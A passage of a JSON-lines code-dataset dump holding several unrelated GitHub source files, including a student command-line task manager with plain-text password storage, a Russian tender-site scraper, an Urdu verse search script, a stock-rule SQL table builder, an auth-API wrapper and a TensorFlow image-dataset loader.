\\t\\t')\r\n conf_password = input('Please re-enter your chosen password: \\t')\r\n if new_user in user_list:\r\n print(f'\\n{RED}This user already exists, please enter a different username{END}')\r\n continue\r\n elif new_user not in user_list and new_password == conf_password:\r\n user_file.write(f'\\n{new_user}, {new_password}')\r\n break\r\n else:\r\n print(f'\\n{RED}Your passwords do not match, please try again{END}')\r\n continue\r\n else:\r\n print(f'\\n{RED}You are not authorised to register new users, please select a different option{END}\\n')\r\n continue \r\n user_file.close()\r\n\r\ndef view_all():\r\n print(f'\\n═══════════════════ {DARKCYAN}{BOLD}View All Tasks{END} ══════════════════\\n')\r\n tasks_read = open('T26 Capstone 3/tasks.txt', 'r')\r\n data = tasks_read.readlines()\r\n # loop through all split lines and output the correct index for each data column\r\n for pos, line in enumerate(data,1):\r\n split_data = line.split(', ')\r\n output = f'∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞[{DARKCYAN}{BOLD}{pos}{END}]∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n output += '\\n'\r\n output += f'Assigned To: \\t\\t{split_data[0]}\\n'\r\n output += f'Task Name: \\t\\t{split_data[1]}\\n'\r\n output += f'Task Description: \\t{split_data[2]}\\n'\r\n output += f'Assigned Date: \\t\\t{split_data[3]}\\n'\r\n output += f'Due Date: \\t\\t{split_data[4]}\\n'\r\n output += f'Is Completed: \\t\\t{split_data[5]}\\n'\r\n \r\n print(output)\r\n tasks_read.close()\r\n \r\n\r\ndef add_task():\r\n print(f'\\n═══════════════════ {BLUE}{BOLD}Add A New Task{END} ══════════════════\\n')\r\n task_user = input('Please enter the username of the person the task is assigned to:\\t\\t')\r\n task_title = input('Please enter the task title:\\t\\t\\t\\t\\t\\t\\t')\r\n task_desc = input('Please enter a task description:\\t\\t\\t\\t\\t\\t')\r\n curr_date = input('Please enter todays date as the date assigned in the format \\'XX XXX XXXX\\':\\t')\r\n due_date = input('Please enter a due date for the task in the format \\'XX XXX XXXX\\':\\t\\t')\r\n\r\n tasks_file = open('T26 Capstone 3/tasks.txt', 'a+')\r\n tasks_file.write(f'{task_user}, {task_title}, {task_desc}, {curr_date}, {due_date}, No')\r\n tasks_file.close()\r\n\r\ndef view_mine():\r\n print(f'\\n══════════════════ {PURPLE}{BOLD} View My Tasks{END} ═══════════════════\\n')\r\n user_tasks_read = open('T26 Capstone 3/tasks.txt', 'r')\r\n data = user_tasks_read.readlines()\r\n # repeat method used for all tasks but ensure the first index matches the user currently logged in\r\n for pos, line in enumerate(data,1):\r\n split_data = line.split(', ')\r\n if split_data[0] == user:\r\n output = f'∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞[{PURPLE}{BOLD}{pos}{END}]∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n output += '\\n'\r\n output += f'Assigned To: \\t\\t{split_data[0]}\\n'\r\n output += f'Task Name: \\t\\t{split_data[1]}\\n'\r\n output += f'Task Description: \\t{split_data[2]}\\n'\r\n output += f'Assigned Date: \\t\\t{split_data[3]}\\n'\r\n output += f'Due Date: \\t\\t{split_data[4]}\\n'\r\n output += f'Is Completed: \\t\\t{split_data[5]}\\n'\r\n print(output)\r\n\r\n while True:\r\n task_num = int(input('Please enter a specific task number to edit the task or enter -1 to return to main menu: '))-1\r\n if task_num == -2:\r\n return \r\n elif task_num < 0 or task_num > len(data):\r\n print('Please select a valid task number.')\r\n continue\r\n \r\n edit_data = data[task_num] \r\n split_edit_data = edit_data.split(', ')\r\n break\r\n \r\n while True:\r\n output = f'\\n∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞ {PURPLE}{BOLD}Select an option{END} ∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n output += f'\\n🔸 {BOLD}1{END} - Edit the task \\n'\r\n output += f'🔸 {BOLD}2{END} - Mark as completed \\n'\r\n choice = int(input(output))\r\n \r\n if choice <= 0 or choice >= 3:\r\n print('you have selected an invalid option')\r\n continue\r\n\r\n if split_edit_data[5].strip('\\n') == 'Yes':\r\n print(f'\\n{RED}This task is completed and can no longer be edited{END}')\r\n elif choice == 1:\r\n while True:\r\n output = f'\\n{PURPLE}{BOLD} Select an option or enter -1 to return to main menu{END}\\n'\r\n output += f'\\n🔸 {BOLD}1{END} - Edit username \\n'\r\n output += f'🔸 {BOLD}2{END} - Edit due date \\n'\r\n output += f'🔸 {BOLD}3{END} - Edit both \\n'\r\n output += f'\\n∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞���∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n\r\n edit_choice = int(input(output))\r\n\r\n if edit_choice == -1:\r\n break\r\n elif edit_choice == 1:\r\n split_data = edit_data.split(', ')\r\n split_data[0] = input('Please enter a new username for this task: ')\r\n new_data = ', '.join(split_data)\r\n data[task_num] = new_data\r\n tasks_write = open('T26 Capstone 3/tasks.txt', 'w')\r\n for line in data:\r\n tasks_write.write(line)\r\n \r\n\r\n if edit_choice == 2:\r\n split_data = edit_data.split(', ')\r\n split_data[4] = input('Please enter a new due date for this task: ')\r\n new_data = ', '.join(split_data)\r\n data[task_num] = new_data\r\n tasks_write = open('T26 Capstone 3/tasks.txt', 'w')\r\n for line in data:\r\n tasks_write.write(line)\r\n \r\n\r\n if edit_choice == 3:\r\n split_data = edit_data.split(', ')\r\n split_data[0] = input('Please enter a new username for this task: ')\r\n split_data[4] = input('Please enter a new due date for this task: ')\r\n new_data = ', '.join(split_data)\r\n data[task_num] = new_data\r\n tasks_write = open('T26 Capstone 3/tasks.txt', 'w')\r\n for line in data:\r\n tasks_write.write(line)\r\n break\r\n\r\n \r\n elif choice == 2:\r\n split_data = edit_data.split(', ')\r\n split_data[-1] = 'Yes\\n'\r\n new_data = ', '.join(split_data)\r\n data[task_num] = new_data\r\n tasks_write = open('T26 Capstone 3/tasks.txt', 'w')\r\n for line in data:\r\n tasks_write.write(line)\r\n \r\n \r\n break\r\n\r\n user_tasks_read.close()\r\n tasks_write.close()\r\n \r\ndef generate_reports():\r\n# writing the task overview file\r\n user_tasks_read = open('T26 Capstone 3/tasks.txt', 'r')\r\n data = user_tasks_read.readlines()\r\n task_overview = open('T26 Capstone 3/task_overview.txt', 'w') \r\n for pos, line in enumerate(data,1): \r\n num_tasks = pos\r\n count_complete = 0\r\n count_uncomplete = 0 \r\n overdue = 0\r\n# use for loop to count the jobs that have been completed\r\n for line in data:\r\n if line.split(', ')[5].strip('\\n') == 'Yes':\r\n count_complete += 1\r\n else:\r\n count_uncomplete += 1\r\n\r\n due_date = line.split(', ')[4] # the due date in the format \"XX XXX XXXX\" \r\n due_date_datetime = datetime.strptime(due_date, \"%d %b %Y\") # convert the string to a datetime object\r\n if line.split(', ')[5].strip('\\n') == 'No' and datetime.now() > due_date_datetime:\r\n overdue += 1\r\n else:\r\n overdue\r\n\r\n task_overview.write(f\"\"\"════════════════════ TASK OVERVIEW REPORT ═════════════════════\r\nNumber of Tasks:\\t\\t\\t{num_tasks}\r\nNumber of Complete Tasks:\\t{count_complete}\r\nNumber of Uncomplete Tasks:\\t{count_uncomplete}\r\nNumber of Overdue Tasks:\\t{overdue}\r\n% of Uncomplete Tasks:\\t\\t{round(count_uncomplete/num_tasks*100,1)}\r\n% of Overdue Tasks:\\t\\t\\t{round(overdue/count_uncomplete*100,1)}\"\"\")\r\n\r\n# writing the user overview file\r\n# many similar steps are repeated from the tasks overview, however there's an added layer of complexity because we need to reference both the user and tasks file here\r\n# I had to append all the output to a list in order to write it to the txt file\r\n user_file_read = open('T26 Capstone 3/user.txt', 'r')\r\n user_data = user_file_read.readlines()\r\n user_overview = open('T26 Capstone 3/user_overview.txt', 'w')\r\n my_list = []\r\n for pos, line in enumerate(user_data,1): \r\n num_users = pos\r\n split_data = line.split(', ')\r\n output = f'∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞ {split_data[0]} ∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n user_task_count = 0\r\n user_count_comp = 0\r\n user_count_todo = 0\r\n user_count_overdue = 0\r\n for pos, line in enumerate(data,1): \r\n due_date = line.split(', ')[4] # the due date in the format \"XX XXX XXXX\" \r\n due_date_datetime = datetime.strptime(due_date, \"%d %b %Y\") \r\n if line.split(', ')[0] == split_data[0]:\r\n user_task_count += 1\r\n if line.split(', ')[5].strip('\\n') == 'Yes':\r\n user_count_comp +=1\r\n else:\r\n user_count_todo += 1\r\n if line.split(', ')[5].strip('\\n') == 'No' and datetime.now() > due_date_datetime:\r\n user_count_overdue += 1\r\n \r\n output += f'Total Number of Tasks:\\t\\t\\t{str(user_task_count)}\\n'\r\n output += f'% of Total Number of Tasks:\\t\\t{round(user_task_count / num_tasks * 100,1)}\\n'\r\n try:\r\n output += f'% of Tasks Completed:\\t\\t\\t{round(user_count_comp / user_task_count * 100,1)}\\n'\r\n except ZeroDivisionError:\r\n output += f'% of Tasks Completed:\\t\\t\\t0.0\\n'\r\n try:\r\n output += f'% of Tasks Uncompleted:\\t\\t\\t{round(user_count_todo / user_task_count * 100,1)}\\n'\r\n except ZeroDivisionError:\r\n output += f'% of Tasks Uncompleted:\\t\\t\\t0.0\\n'\r\n try:\r\n output += f'% of Tasks Overdue:\\t\\t\\t\\t{round(user_count_overdue / user_count_todo * 100,1)}\\n'\r\n except ZeroDivisionError:\r\n output += f'% of Tasks Overdue:\\t\\t\\t\\t0.0\\n'\r\n \r\n my_list.append(output) \r\n \r\n \r\n user_overview.write(f\"\"\"════════════════════ USER OVERVIEW REPORT ═════════════════════\r\nNumber of Users:\\t\\t\\t\\t{num_users}\r\nNumber of Tasks:\\t\\t\\t\\t{num_tasks}\\n\"\"\")\r\n user_overview.writelines(my_list)\r\n\r\n user_tasks_read.close()\r\n task_overview.close()\r\n user_overview.close()\r\n user_file_read.close()\r\n\r\n\r\n \r\n#====Login Section=======================================================\r\n\r\nprint(f\"\"\" \r\n {RED}╔══════════════════╗{END}\r\n {BOLD}TASK MANAGER \r\n {RED}╚══════════════════╝{END}\r\n \"\"\")\r\nprint('')\r\n\r\nprint(f'══════════ 👋 {YELLOW}{BOLD}Welcome! Please log in!{END} 👋 ═══════════\\n')\r\n# Created a list for users and then added users and passwords to a dictionary \r\nuser_list = []\r\npass_dict = {}\r\n\r\nuser_file = open('T26 Capstone 3/user.txt', 'r')\r\nfile_read = user_file.readlines()\r\n# Loop through the user file, split, append the users to list, users will be keys and then passwords as the values\r\nfor line in file_read:\r\n temp = line.strip('\\n')\r\n temp = temp.split(', ')\r\n user_list.append(temp[0])\r\n pass_dict[temp[0]]=temp[1]\r\n\r\n\"\"\"verify inputs using the user list and passwords in the dictionary,\r\nbreak the loop if both username and password are correct\r\n\"\"\"\r\nwhile True:\r\n user = input('Please enter your username:\\t')\r\n password = input('Please enter your password:\\t')\r\n \r\n if user in user_list and password != pass_dict[user]:\r\n print(f'\\nHello {user}, please enter a valid username and password')\r\n continue \r\n elif user not in user_list:\r\n print('\\nPlease enter a valid username and password\\n')\r\n continue\r\n elif password == pass_dict[user] and user in user_list:\r\n print(f'\\nThank you. Hello {user}!\\n')\r\n break\r\n \r\nuser_file.close()\r\n \r\n# Give admin account additional options, else give standard options\r\nwhile True:\r\n if user == 'admin':\r\n print(f'\\n═════════════════ 🔴 {GREEN}Main Menu{END} 🔴 ═══════════════════\\n')\r\n menu = input(f'''\\nSelect one of the following options below:\r\n🔸 {BOLD}r{END} - Registering a user\r\n🔸 {BOLD}a{END} - Adding a task\r\n🔸 {BOLD}va{END} - View all tasks\r\n🔸 {BOLD}vm{END} - View my task\r\n🔸 {BOLD}gr{END} - Generate reports\r\n🔸 {BOLD}s{END} - Display statistics\r\n🔸 {BOLD}e{END} - Exit\r\n\r\n: ''').lower()\r\n\r\n else:\r\n print(f'\\n═════════════════ 🔴 {GREEN}Main Menu{END} 🔴 ═══════════════════\\n')\r\n menu = input(f'''\\nSelect one of the following options below:\r\n🔸 {BOLD}r{END} - Registering a user\r\n🔸 {BOLD}a{END} - Adding a task\r\n🔸 {BOLD}va{END} - View all tasks\r\n🔸 {BOLD}vm{END} - View my task\r\n🔸 {BOLD}e{END} - Exit\r\n\r\n: ''').lower()\r\n\r\n# if user selects r and is logged in as admin, allow to add user if passwords match, else deny request\r\n if menu == 'r':\r\n if user == 'admin':\r\n reg_user() \r\n else:\r\n print(f'\\n{RED}You are not authorised to register new users, please select a different option{END}\\n')\r\n continue\r\n \r\n# ask for user inputs then write these to the tasks file using a+ access mode\r\n elif menu == 'a':\r\n add_task()\r\n\r\n elif menu == 'va':\r\n view_all()\r\n\r\n elif menu == 'vm':\r\n view_mine()\r\n# call the function to generate the reports and then print in the terminal using read and a for loop \r\n elif menu == 's' and user == 'admin':\r\n generate_reports()\r\n task_overview = open('T26 Capstone 3/task_overview.txt','r')\r\n\r\n for line in task_overview:\r\n line = line.replace('\\t',' ')\r\n print(line)\r\n print()\r\n user_overview = open('T26 Capstone 3/user_overview.txt','r')\r\n for line in user_overview:\r\n line = line.replace('\\t',' ')\r\n print(line)\r\n \r\n task_overview.close()\r\n user_overview.close()\r\n# if admin selects gr, write the reports to 2 txt files\r\n elif menu == 'gr' and user == 'admin':\r\n generate_reports()\r\n\r\n elif menu == 'e':\r\n print(f'\\n═════════════════ 👋 {YELLOW}{BOLD}Goodbye!!!{END} 👋 ══════════════════\\n')\r\n exit()\r\n\r\n else:\r\n print(f\"\\n{RED}You have made a wrong choice, Please Try again{END}\\n\")","repo_name":"GazMorton/Task-Manager-Program","sub_path":"task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":18054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20519902661","text":"import datetime\nimport sqlite3\n\nfrom tenders.parsers.abstractParser import AbstractParser, TenderIsExpired\n\n\nclass Parser(AbstractParser):\n def init_search_line(self, keyword):\n search_line1 = 'http://zakupki.gov.ru/epz/order/quicksearch/search_eis.html?searchString='\n search_line2 = '&pageNumber=1&sortDirection=false&recordsPerPage=_10&showLotsInfoHidden=false&fz44=on&fz223=on&ppRf615=on&af=on¤cyId=-1®ionDeleted=false&sortBy=PUBLISH_DATE'\n self.search_line = search_line1 + keyword + search_line2\n\n def go_to_next_page(self):\n texts = self.search_line.split('pageNumber=')\n page_number = int(texts[1][0])\n page_number += 1\n self.search_line = texts[0] + 'pageNumber=' + str(page_number) + texts[1][1:]\n\n def search_on_current_page(self, soup):\n objs = soup.findAll('div', attrs={'class': 'registerBox registerBoxBank margBtm20'})\n for obj in objs:\n self.parse_obj(obj)\n\n def parse_obj(self, obj):\n obj1 = obj.find('td', attrs={'class': 'descriptTenderTd'})\n obj1 = obj1.find('a', attrs={'target': '_blank'})\n url = obj1['href']\n if url.startswith('/'):\n url = 'http://zakupki.gov.ru' + url\n obj2 = obj.find('td', attrs={'class': 'tenderTd'})\n obj2 = obj2.findAll('dd')[1]\n obj2 = obj2.find('strong')\n try:\n text = obj2.text.strip()\n text1 = text.split(',')[0].strip().replace('\\xa0', '')\n text2 = text.split(',')[1].strip()\n text = text1 + '.' + text2\n _sum = float(text)\n except AttributeError:\n _sum = 0.\n obj3 = obj.find('td', attrs={'class': 'descriptTenderTd'})\n obj3 = obj3.findAll('dd')[1]\n try:\n description = obj3.text.strip().replace('\"', '\\'')\n except AttributeError:\n description = ''\n obj4 = obj.find('td', attrs={'class': 'descriptTenderTd'})\n obj4 = obj4.findAll('dd')[0]\n try:\n customer = obj4.text.strip().split(':')[1].strip().replace('\"', '\\'')\n except AttributeError:\n customer = ''\n obj5 = obj.find('td', attrs={'class': 'amountTenderTd'})\n obj5 = obj5.find('li')\n try:\n text = obj5.text.strip().split(':')[1].strip()\n created = text.split('.')[2]+'-'+text.split('.')[1]+'-'+text.split('.')[0]\n except AttributeError:\n created = '2100-01-01'\n deadline = '2018-12-31'\n loaded = str(datetime.date.today())\n on_delete = False\n if created < '2018-11-28':\n raise TenderIsExpired()\n conn = sqlite3.connect('db.sqlite3')\n cursor = conn.cursor()\n cursor.execute('select * from tenders_tender order by id desc')\n res = cursor.fetchall()\n conn.close()\n if len(res) != 0:\n res = res[0][1]\n if url == res:\n raise TenderIsExpired()\n self.create_tender(url, description, customer, _sum, created, deadline, loaded, on_delete)\n\n","repo_name":"terrysloane8/my_site","sub_path":"tenders/parsers/zakupki_gov_ru_parser.py","file_name":"zakupki_gov_ru_parser.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21267905719","text":"#Finding a verse(شعر) from file with given words\n\nfrom itertools import islice\nimport os\n\nBASE = os.path.join(\"H:\",os.sep,\"MISC\",\"URDU\",\"NasirKazmi\")\nFILE = os.path.join(BASE,\"Nasir.txt\")\n\nfind = ('دھوپ','فراق','گرفتگی')\nprevLine = \"\"\n\nwith open(FILE, 'r', encoding='utf-8') as infile:\n for line in infile:\n if any(word in line for word in find):\n if prevLine.strip() == '':\n print( '{}'.format(line.rstrip()) )\n\n #Print next line using islice function and value 1 for just next line\n print( ''.join(islice(infile, 1)) )\n elif prevLine.strip() != '':\n print(prevLine) \n print( line )\n \n #print('{:4d}: {}'.format(line_no-1, previous) )\n \n prevLine = line.lower()\n","repo_name":"Mohibtech/Mohib-Python","sub_path":"urdu scripts/Finding Verse for words.py","file_name":"Finding Verse for words.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"3737275253","text":"from gettext import gettext as _\n\nfrom gi.repository import Gtk, Granite\n\n\nclass DocumentContextMenu(Gtk.Menu):\n\n def __init__(self, attach_to=None, archived=False):\n super().__init__()\n self.attach_to_widget(attach_to)\n\n export_menu = Gtk.MenuItem(action_name='document.export')\n export_menu.add(Granite.AccelLabel.from_action_name(_('Export...'), 'document.export'))\n\n rename_menu = Gtk.MenuItem(action_name='document.rename')\n rename_menu.add(Granite.AccelLabel.from_action_name(_('Rename'), 'document.rename'))\n\n archive_menu = Gtk.MenuItem(action_name='document.archive')\n archive_menu.add(Granite.AccelLabel.from_action_name(_('Archive'), 'document.archive'))\n\n unarchive_menu = Gtk.MenuItem(action_name='document.unarchive')\n unarchive_menu.add(Granite.AccelLabel.from_action_name(_('Unarchive'), 'document.unarchive'))\n\n delete_menu = Gtk.MenuItem(action_name='document.delete')\n delete_menu.add(Granite.AccelLabel.from_action_name(_('Delete'), 'document.delete'))\n\n self.append(rename_menu)\n self.append(Gtk.SeparatorMenuItem())\n self.append(export_menu)\n self.append(Gtk.SeparatorMenuItem())\n\n if not archived:\n self.append(archive_menu)\n else:\n self.append(unarchive_menu)\n\n self.append(delete_menu)\n self.show_all()\n","repo_name":"rottenpants466/Norka","sub_path":"norka/widgets/document_context_menu.py","file_name":"document_context_menu.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"12913935727","text":"import logging\nimport sqlite3\n\nfrom pyswing.utils.Logger import Logger\nimport pyswing.constants\nimport pyswing.database\n\n\nclass HistoricMatches(object):\n \"\"\"\n ?\n \"\"\"\n\n def __init__(self):\n \"\"\"\n ?\n \"\"\"\n\n Logger.log(logging.DEBUG, \"Log Object Creation\", {\"scope\": __name__})\n\n self._rules = self._getRules()\n\n def createTable(self):\n\n self._createTable(0, 50)\n self._createTable(51, 100)\n self._createTable(101, 150)\n self._createTable(151, 200)\n\n deleteTableStatement = \"DROP TABLE IF EXISTS HistoricMatches\"\n createTableStatement = \"\"\"CREATE TABLE HistoricMatches AS\n select h1.Date, h1.Code, h1.matchString || h2.matchString || h3.matchString || h4.matchString as matchString\n from HistoricMatches_0_50 h1\n inner join HistoricMatches_51_100 h2 on h1.Date = h2.Date and h1.Code = h2.Code\n inner join HistoricMatches_101_150 h3 on h1.Date = h3.Date and h1.Code = h3.Code\n inner join HistoricMatches_151_200 h4 on h1.Date = h4.Date and h1.Code = h4.Code\n \"\"\"\n\n connection = sqlite3.connect(pyswing.database.pySwingDatabase)\n c = connection.cursor()\n c.executescript(deleteTableStatement)\n c.executescript(createTableStatement)\n connection.commit()\n c.close()\n connection.close()\n\n def _createTable(self, startIndex, stopIndex):\n\n Logger.log(logging.INFO, \"Create Historic Matches Table\",\n {\"scope\": __name__, \"startIndex\": str(startIndex), \"stopIndex\": str(stopIndex)})\n\n deleteTableStatement, createTableStatement = self._generateSqlStatements(startIndex, stopIndex)\n\n # print(deleteTableStatement)\n # print(createTableStatement)\n\n connection = sqlite3.connect(pyswing.database.pySwingDatabase)\n c = connection.cursor()\n c.executescript(deleteTableStatement)\n c.executescript(createTableStatement)\n connection.commit()\n c.close()\n connection.close()\n\n def _getRules(self):\n connection = sqlite3.connect(pyswing.database.pySwingDatabase)\n\n query = \"SELECT name FROM sqlite_master WHERE type='table' and name like 'Rule %' order by name\"\n\n rules = None\n\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n rules = cursor.fetchall()\n except sqlite3.OperationalError:\n Logger.log(logging.INFO, \"Error Getting Rules\", {\"scope\": __name__})\n\n connection.close()\n\n return [(rule[0]) for rule in rules]\n\n def _generateSqlStatements(self, startIndex, stopIndex):\n\n tableName = \"HistoricMatches_%i_%i\" % (startIndex, stopIndex)\n\n deleteTableStatement = \"DROP TABLE IF EXISTS %s\" % (tableName)\n\n createTableStatement = \"CREATE TABLE %s AS \\n\" % (tableName)\n selectStatement = \"select r%i.Date, r%i.Code, ''\" % (startIndex, startIndex)\n fromStatement = \"\"\n joinStatement = \"\"\n\n for index, rule in enumerate(self._rules):\n\n if index >= startIndex and index <= stopIndex:\n\n selectStatement += \" || ifnull(r%i.Match, 0)\" % (index)\n\n if index == startIndex:\n fromStatement = \"\\nfrom \\\"%s\\\" r%i\\n\" % (rule, index)\n else:\n if \"_ADI\" in rule:\n joinStatement += \"inner join \\\"%s\\\" r%i on r%i.Date = r%i.Date\\n\" % (\n rule, index, startIndex, index)\n else:\n joinStatement += \"inner join \\\"%s\\\" r%i on r%i.Date = r%i.Date and r%i.Code = r%i.Code\\n\" % (\n rule, index, startIndex, index, startIndex, index)\n\n selectStatement += \" as matchString\"\n\n createTableStatement += selectStatement + fromStatement + joinStatement\n\n return (deleteTableStatement, createTableStatement)\n","repo_name":"garyjoy/pyswing","sub_path":"pyswing/objects/historicMatches.py","file_name":"historicMatches.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34472981076","text":"\nimport matlab.engine\n\nimport RealtimePlotter.Temp_30_Pause as Tm_30\n\nimport RealtimePlotter.Real_1_animation_Class as R1\n#from RealtimePlotter.Real_1_animation_Class import * # #import _SinePlotter\n\nimport RealtimePlotter.CSI_GUI as CGUI #CGUI.param_get/CGUI.param_list/CGUI.CSI_GU\n#from RealtimePlotter.CSI_GUI import *\n\nimport threading\nimport time\n\n\ncsi_windaw_state=False\n\nif __name__ == '__main__':\n\n global csi_windaw_state\n #初始化matlab\n eng = matlab.engine.start_matlab()\n print(\"Matlab_OK\")\n eng.path(eng.path(), r'/home/houhuan/Pycharm/Workplace/CSI_process/matlab_function')#为Matlab添加新的工作路径\n\n #csi_trace, pin = eng.read_file_realtime(r'/linux-80211n-csitool-supplementary/CSI_Data/666.dat', 0, nargout=2);##########%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 调用了matlab engine\n GUI= threading.Thread(target=CGUI.CSI_GUI)\n #GUI.setDaemon(True) #主线程退出,该线程退出\n GUI.start()\n while GUI.is_alive():\n print(\"test\")\n if CGUI.param_get:\n #CGUI.param_list[0]\n #读取参数,调用相应的画图功能函数\n if CGUI.param_list[4]==1:\n #调用1个子载波实时画图\n plotter =R1._SinePlotter(eng)\n csi_windaw_state = True\n plotter.start()#一个线程,即主线程调用画图函数,根据初始化过程,定时(interval_msec=66)的更新图画数据(getValues)\n if ~plotter.is_open:\n csi_windaw_state=False\n else:\n #调用30个子载波画图\n csi_windaw_state = True\n Tm_30.start_30_fun(eng)\n if ~Tm_30.is_open:\n csi_windaw_state = False\n param_get = False #关闭窗口之后才允许再次传参数\n\n\n print(\"houge\")\n","repo_name":"iamhouhuanhuan/Real_CSI_Test","sub_path":"RealtimePlotter/phaseplot.py","file_name":"phaseplot.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"41108366494","text":"from titanauth.models.user_reference import ExternalAuthReference\nfrom titanauth.authentication.constants import (\n AUTH_AUTHENTICATE_URL, AUTH_STATE_URL, AUTH_RELEASE_URL\n)\n\nimport requests\nimport json\n\n\nclass AuthWrapper(object):\n def __init__(self):\n \"\"\"\n Initialize new AuthWrapper object.\n \"\"\"\n self.reference = ExternalAuthReference.objects.first()\n\n def authenticate(self):\n \"\"\"\n Attempt to authenticate a specified set of credentials against the external backend.\n\n If no credentials are specified, an attempt is made to use the user reference if one is available.\n \"\"\"\n # Fire a request off to the external backend, to determine if the information present\n # exists and is valid within the system.\n return requests.post(\n url=AUTH_AUTHENTICATE_URL,\n data={\n \"email\": self.reference.email,\n \"token\": self.reference.token\n }\n )\n\n def authenticate_runner(self):\n \"\"\"\n Attempt to authenticate a user and return simple booleans to determine status.\n \"\"\"\n if not self.reference.valid:\n # User is logged in already, and they're reference is not\n # in a valid state, return false early.\n return False\n\n try:\n response = requests.post(\n url=AUTH_AUTHENTICATE_URL,\n data={\n \"email\": self.reference.email,\n \"token\": self.reference.token,\n }\n )\n _content = json.loads(response.content)\n except Exception:\n # Return false if any errors occur while requesting\n # authentication status.\n return False\n\n # Return the current status for this users authentication\n # check, this allows us to force a logout or instance termination.\n return _content[\"status\"] != \"error\"\n\n def _state(self, state):\n if not self.reference.valid:\n raise ValueError(\"Authentication reference: {ref} is invalid.\".format(ref=self.reference))\n\n return requests.post(\n url=AUTH_STATE_URL,\n data={\n \"email\": self.reference.email,\n \"token\": self.reference.token,\n \"state\": state,\n }\n )\n\n def offline(self):\n \"\"\"\n Attempt to set the current authentication wrapper to an offline state.\n \"\"\"\n return self._state(state=\"offline\")\n\n def online(self):\n \"\"\"\n Attempt to set the current authentication reference to an online state.\n \"\"\"\n return self._state(state=\"online\")\n\n def release_information(self, version):\n \"\"\"\n Retrieve the version information for the specified version.\n \"\"\"\n if not self.reference.valid:\n raise ValueError(\"Authentication reference: {ref} is invalid.\".format(ref=self.reference))\n\n return requests.get(\n url=AUTH_RELEASE_URL,\n params={\n \"version\": version\n }\n ).json()\n","repo_name":"hohenheim52/titandash","sub_path":"titanbot/titanauth/authentication/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14113554677","text":"import os\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.python.data import AUTOTUNE\n\n\nclass CatDataset:\n def __init__(self, input_width, input_height, dataset_dir, annotation_path='./data/train.csv', lable_column='category_id',\n class_mapping=None):\n self.annotation_path = annotation_path\n self.train_features = []\n self.train_labels = []\n self.val_features = []\n self.val_labels = []\n self.input_width = input_width\n self.input_height = input_height\n self.lable_column = lable_column\n self.class_mapping = class_mapping\n self.dataset_dir = dataset_dir\n self.prepare(lable_column=lable_column)\n\n def prepare(self, lable_column):\n df = pd.read_csv(self.annotation_path)\n df['path'] = df.product_id.apply(lambda x: os.path.join(self.dataset_dir, x + \".jpg\"))\n for class_index in self.class_mapping.keys():\n data = df[df[lable_column] == class_index]\n np.random.seed(0)\n mask = np.random.rand(len(data)) < 0.8\n self.train_features.extend(data[mask][\"path\"].tolist())\n self.train_labels.extend(data[mask][lable_column].tolist())\n self.val_features.extend(data[~mask][\"path\"].tolist())\n self.val_labels.extend(data[~mask][lable_column].tolist())\n\n print(f\"There are {len(self.train_features)} training images, {len(self.val_features)} validation images\")\n\n def build(self, mode, batch_size, count=-1):\n if mode == \"train\":\n dataset = tf.data.Dataset.from_tensor_slices(\n (self.train_features, self.train_labels))\n elif mode == \"valid\":\n dataset = tf.data.Dataset.from_tensor_slices(\n (self.val_features, self.val_labels))\n dataset = dataset.map(self.load_from_path_label, num_parallel_calls=AUTOTUNE)\n if mode == \"train\":\n dataset = dataset.map(random_rotate, num_parallel_calls=AUTOTUNE)\n dataset = dataset.map(random_flip, num_parallel_calls=AUTOTUNE)\n dataset = dataset.shuffle(\n buffer_size=1000, reshuffle_each_iteration=True).repeat(count=count).batch(batch_size)\n elif mode == \"valid\":\n dataset = dataset.shuffle(\n buffer_size=1000, reshuffle_each_iteration=True).batch(batch_size=batch_size)\n dataset = dataset.prefetch(buffer_size=AUTOTUNE)\n return dataset\n\n def load_from_path_label(self, path, label):\n image = tf.io.read_file(path)\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize(image, [self.input_width, self.input_height])\n return tf.cast(image, tf.float64), tf.cast(label-1, tf.int32)\n\n\nclass PriceDataset(CatDataset):\n def prepare(self, lable_column):\n df = pd.read_csv(self.annotation_path)\n df['price'] = df['price'].apply(lambda x: x.replace(\",\", \"\"))\n df['price'] = df['price'].astype(float)\n print(df.price.dtype)\n df['path'] = df.product_id.apply(lambda x: os.path.join(self.dataset_dir, x + \".jpg\"))\n np.random.seed(0)\n mask = np.random.rand(len(df)) < 